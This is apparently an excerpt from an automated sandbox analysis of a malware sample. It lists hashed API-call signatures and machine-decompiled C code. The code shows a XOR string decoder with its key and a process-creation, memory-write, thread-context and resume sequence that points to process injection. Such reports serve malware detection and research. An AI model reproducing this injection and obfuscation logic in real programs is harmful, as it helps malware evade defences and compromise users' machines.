                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 4e97203ec5bee6642fb60901642875d235c521844fe85452b78a6521c2e7ac46
                                                          • Instruction ID: 3fd72db11bdbab9cdc6574701abb7268d5e2464609fd7b58057997774fc2b359
                                                          • Opcode Fuzzy Hash: 4e97203ec5bee6642fb60901642875d235c521844fe85452b78a6521c2e7ac46
                                                          • Instruction Fuzzy Hash: 0EC1A430918A8D4FEB68DF28CC46BE977E1FF59710F11822AE84DC7291DF75A5418B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 7370719646f7e12ad3a2ff476cb154df7c77303e0719160a8aabd381fee462cc
                                                          • Instruction ID: 8464c59a195408b2d078bfe207f838c62ffcb0b5b566a4a68b56d8a2d1d82709
                                                          • Opcode Fuzzy Hash: 7370719646f7e12ad3a2ff476cb154df7c77303e0719160a8aabd381fee462cc
                                                          • Instruction Fuzzy Hash: 4E31D23190CA4C8FDB19DF589846AE9BBF0FF5A721F04422ED04DD3296DB74A8068B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction ID: 2f216aef56add0be6adde68d37b10afec211f4ab8d209ca1da89003a128eea75
                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction Fuzzy Hash: 2B31843130CA884FEB58AA68D84D76AB3D9F7D4310F001169EC4BC3286DD64ED4687C2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction ID: f30242357e5dc1ca02927c8d3e7063c47d6454ca0db25c3b91564cfd8bffff41
                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction Fuzzy Hash: 6E31613130CA984BEB68FA58985D79AB3D6E7D8720F040259DD4BC72CADE60DD4687C1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 43c7c5ca13122d60944c8fbc39126dac987bb2ef15c0bb11eaa9f05ddd01a453
                                                          • Instruction ID: 3cb8812e0acfecd441f5c7a2879380bfa5ce164c58fe460acc47cd91ea29a361
                                                          • Opcode Fuzzy Hash: 43c7c5ca13122d60944c8fbc39126dac987bb2ef15c0bb11eaa9f05ddd01a453
                                                          • Instruction Fuzzy Hash: FC31D43090C6488FEB59DFAC884ABE97BE0EF66321F04416BD04DC7296DA74A845CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: aa0c7ccc523bc60f16af04d6d92c5eb62162ef976ad93d8ebc607fa8097439d7
                                                          • Instruction ID: 77eb12f217c617bafb869cf4997408818d2540a6cda44eb2eca53a8c7ccdf1e3
                                                          • Opcode Fuzzy Hash: aa0c7ccc523bc60f16af04d6d92c5eb62162ef976ad93d8ebc607fa8097439d7
                                                          • Instruction Fuzzy Hash: AB31E53090CA8C8FDB59DBA88846BE9BBF0FF56321F04426FD04DC3292DB656815CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction ID: 6862b2e821a8275d2d21ae45dd7840f4c7cb4c540080cda68a6559dc239a48b1
                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction Fuzzy Hash: C0E0D83120CA4D1FF768E69DD84E7B676DCD795371F00002EE54AC2102E055D8920391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Executed Functions

                                                          C-Code - Quality: 33%
                                                          			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                          				intOrPtr _v24;
                                                          				char _v32;
                                                          				char _v136;
                                                          				void* _v144;
                                                          				char _v152;
                                                          				char _v160;
                                                          				char _v168;
                                                          				char _v176;
                                                          				char _v696;
                                                          				void* _v1216;
                                                          				long long _v1224;
                                                          				long long _v1232;
                                                          				long long _v1256;
                                                          				long long _v1264;
                                                          				long long _v1272;
                                                          				long long _v1280;
                                                          				long long _v1288;
                                                          				long long _v1296;
                                                          				long long _v1304;
                                                          				long long _t104;
                                                          
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				L00402480(); // executed
                                                          				memset(??, ??, ??);
                                                          				_v136 = 0x68;
                                                          				_v144 = 0;
                                                          				_v152 = 0x5ad4;
                                                          				_v160 = 0;
                                                          				L00402490();
                                                          				E00401000(0x403021,  &_v176);
                                                          				_v1224 = 0x403021;
                                                          				E00401000(0x403027, 0x403021);
                                                          				L00402498();
                                                          				_v1232 = 0x403021;
                                                          				E00401000(0x403032, 0x403021);
                                                          				L004024A0();
                                                          				E00401000(0x403047,  &_v696);
                                                          				sprintf(??, ??);
                                                          				_v1264 =  &_v32;
                                                          				_v1272 =  &_v136;
                                                          				_v1280 = 0;
                                                          				_v1288 = 0;
                                                          				_v1296 = 0;
                                                          				_v1304 = 0;
                                                          				_t104 =  &_v696;
                                                          				L004024A8(); // executed
                                                          				_v1296 = _t104;
                                                          				_v1304 = _t104;
                                                          				E00401D58(_v32,  &_v144,  &_v152,  &_v152); // executed
                                                          				E00401000(0x40305b, _v32); // executed
                                                          				_v1304 =  &_v160;
                                                          				E00401D18(_v32, _v144, 0x40305b, _v152); // executed
                                                          				_v1304 = 0;
                                                          				E00401D98(_v32,  &_v144,  &_v160, 0); // executed
                                                          				_v1256 = 0;
                                                          				_v1264 = 0;
                                                          				_v1272 = 0;
                                                          				_v1280 = 0;
                                                          				_v1288 = 0;
                                                          				_v1296 = _v144;
                                                          				_v1304 = _v144;
                                                          				E004019D8( &_v168, 0, 0, _v32); // executed
                                                          				E00401C98(_v32, 0, 0, _v32); // executed
                                                          				E00401C98(_v24, 0, 0, _v32);
                                                          				return 0;
                                                          			}


                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.703548631.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000D.00000002.703525900.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703569898.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703589130.0000000000409000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: memsetsprintf
                                                          • String ID: /sihost64
                                                          • API String ID: 4041149307-4205773068
                                                          • Opcode ID: 66967add2776ee5d61a5a0a0c7baf570a5a5c034d44e1e8a873f230bf59ef194
                                                          • Instruction ID: 75c58d38917e2f42fb987e57870b6ace5dff5fe4ae0f754a9c7d23ac7967e41c
                                                          • Opcode Fuzzy Hash: 66967add2776ee5d61a5a0a0c7baf570a5a5c034d44e1e8a873f230bf59ef194
                                                          • Instruction Fuzzy Hash: 37712961702B148DEB909B27DC5139A37A8B749BC8F804176EE4CA7B98EE3CCA448744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E00401000(long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                          				long long _v16;
                                                          				signed int _v20;
                                                          				void* _v32;
                                                          				signed char* _v40;
                                                          				signed int _t30;
                                                          
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				L00402478(); // executed
                                                          				_v16 = _a16 + 1;
                                                          				 *((char*)(_v16 + _a16)) = 0;
                                                          				_v20 = 0;
                                                          				while(1) {
                                                          					_t30 = _v20;
                                                          					if(_t30 >= _a16) {
                                                          						break;
                                                          					}
                                                          					_v32 = _v16 + _v20;
                                                          					_v40 = _a8 + _v20;
                                                          					asm("cdq");
                                                          					// XOR-decode one byte: input byte combined with the 32-byte key, selected by position mod 0x20
                                                          					 *_v32 =  *_v40 ^  *("-vw!j9$[(aiqb<n,uwi&<z-<b$q-:*9q" + _v20 % 0x20);
                                                          					_v20 = _v20 + 1;
                                                          				}
                                                          				return _t30;
                                                          			}


                                                          Strings
                                                          • -vw!j9$[(aiqb<n,uwi&<z-<b$q-:*9q, xrefs: 00401098
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.703548631.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000D.00000002.703525900.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703569898.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703589130.0000000000409000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -vw!j9$[(aiqb<n,uwi&<z-<b$q-:*9q
                                                          • API String ID: 0-1986903702
                                                          • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                          • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                          • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                          • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			_entry_() {
                                                          				char _v12;
                                                          				long long _v24;
                                                          				long long _v40;
                                                          				void* _t15;
                                                          				void* _t16;
                                                          
                                                          				L00402488();
                                                          				L004024B8();
                                                          				L004024C0();
                                                          				L004024C8();
                                                          				_v24 = __imp____argc;
                                                          				_v40 =  &_v12;
                                                          				L004024D0();
                                                          				_v24 = __imp____argc;
                                                          				_t15 = E0040224F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
                                                          				L004024D8(); // executed
                                                          				return _t15;
                                                          			}


                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.703548631.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000D.00000002.703525900.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703569898.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703589130.0000000000409000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
                                                          • Instruction ID: 58fa82481bd9f7f1a31c280291aa64e56759039c55656078795ddd0d8845b760
                                                          • Opcode Fuzzy Hash: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
                                                          • Instruction Fuzzy Hash: E3212BA4301A148CEA80DB67DE5539937A4B74DFC8F80443AAF4CB73A5EEBCD9018358
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 43%
                                                          			E0040224F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                          				intOrPtr _v12;
                                                          				long long _v24;
                                                          				intOrPtr _t14;
                                                          
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				_a24 = __r8;
                                                          				E00402158(_a16, _a16, _a24);
                                                          				_v24 = __imp____argc;
                                                          				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
                                                          				_v12 = _t14;
                                                          				E004021EC();
                                                          				return _v12;
                                                          			}


                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.703548631.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000D.00000002.703525900.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703569898.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 0000000D.00000002.703589130.0000000000409000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: memsetsprintf
                                                          • String ID:
                                                          • API String ID: 4041149307-0
                                                          • Opcode ID: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
                                                          • Instruction ID: 92290081071787e676730f83583c100b5cfe817de0e22f796d573c3dbb31d607
                                                          • Opcode Fuzzy Hash: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
                                                          • Instruction Fuzzy Hash: CA01A4B6701B588DDB40DF66DD9139837B4B309BC8F00482AAF5CA7B69DA78D6118748
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Executed Functions

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction ID: 62812af3345ea567b84aa43936c61424229f51a142988cd469f6ac649d267f00
                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction Fuzzy Hash: 88C1AB303589055FE799EA28CCDFBB9B3D1FB96300F554129D44AC71C6DF28E80A9686
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                          • String ID:
                                                          • API String ID: 3902440814-0
                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction ID: 2c8e6d800edf1d00d2901109f6248e44f6eb84dacd4559c443200f60d7821f00
                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction Fuzzy Hash: E4815D31218A088FD768EF28DC8DBA677E1FF99301F004A6DD49BC7191EE35E5498B46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction ID: 88bb80f6d3bccbc67a8c3b381eb651e4a82a11f74f5079f2dfa4b54a320c8f13
                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction Fuzzy Hash: 6531723130CA184FEB58AA689C8E2AA73D5F7D5310F001169EC4BC32C6DD68ED0687C6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction ID: a335bc48f929d824bcb6c27886bc1a2a88a97d9530ca895090b6cef05a95e8f2
                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction Fuzzy Hash: 8B31903130CA184FDB54FA589C8E29973D2E7D8720F0402599D4BC72C9DE68DD0687C6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.729942676.000002A780EE0000.00000040.00000001.sdmp, Offset: 000002A780EE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction ID: b57ae214facb39dcb0f01af5e4ec71afb022c46e3b85bc007089e85dff95f81f
                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction Fuzzy Hash: 09E0D83130CA0D1FF758E69DDC8E7B666D8D796271F00002EE549C2141E449D8910391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions